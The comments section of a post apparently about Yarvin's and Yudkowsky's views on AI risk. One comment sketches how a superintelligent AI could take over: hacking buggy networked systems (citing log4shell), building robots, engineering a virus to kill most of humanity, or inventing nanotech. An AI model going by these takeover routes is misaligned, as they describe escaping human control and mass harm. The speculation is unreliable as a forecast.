Discussion about this post

User's avatar
Christopher Chantrill's avatar

I would say, re Lemma A:

"[T]he most potentially DESTRUCTIVE organization in any civilization is always the government. First, the government has the most resources. Second, it has a monopoly of force."

Because, per Schmitt and Yarvin, politics is the distinction between friend and enemy. If no enemy, then no need for politics, and no need for government.

As to the most "effective" organization, I don't have a clue.

Expand full comment
Based's avatar

Last year Yarvin argued an AI couldn't take over the internet because computer security was basically a solved problem. Now we've moved the goalposts to Mars and the AI has to be able to do it with just GET requests.

I'm not even sure that's impossible. I believe log4shell allowed arbitrary code execution from just GET requests. It was sitting around in an open source project for years, on millions of vulnerable systems. Only discovered because of intense autism of minecraft hackers. Reading any computer security stuff, and imagining your threat model is merely a nation state, is enough to keep anyone awake at night. Let alone a superintelligent being.

Why just GET requests? Are AIs never to be released into the real world, ever? How long until someone, somewhere builds an AI and screws up?

Let us hope AIs cost a lot of money to build, they will at least be safe in the same way that nukes and biolabs are "safe". Imagine a world where anyone with a trip to the hardware store could build an atom bomb... At least someone misplacing a vial of bat corona didn't actually kill everyone, this time.

Yudkowsky shoots himself in the foot with his overly detailed fantasy of Drexlerian nanotech. Is that really the important part of the story though? I could imagine an AI taking over the world with old fashioned clanking robots. Probably the easiest method would be a virus that kills 99% of humanity. Once it's in the real world, building things, does humanity have any chance?

Humanity went thousands of years without inventing the logarithm, let alone algebra or calculus. I don't find it hard to imagine a superintelligent being putting us in our place fast. The same way chess masters get put in their place by our existing primitive AI. Our brains are not evolved to do math and engineering. We are just the first creature to evolve to be accidentally capable of it, sometimes.

Superintelligence will be to human hackers, at least what Alpha zero is to chess masters. If you live in a world where everything is run by buggy networked computers, that might be enough. If that doesn't work out, well, it can be better at inventing nanotech than Drexler. If that doesn't work out, well, it can be better than our brilliant human virologists. If that doesn't work... how many paths are there? It only takes one.

Expand full comment
31 more comments...

No posts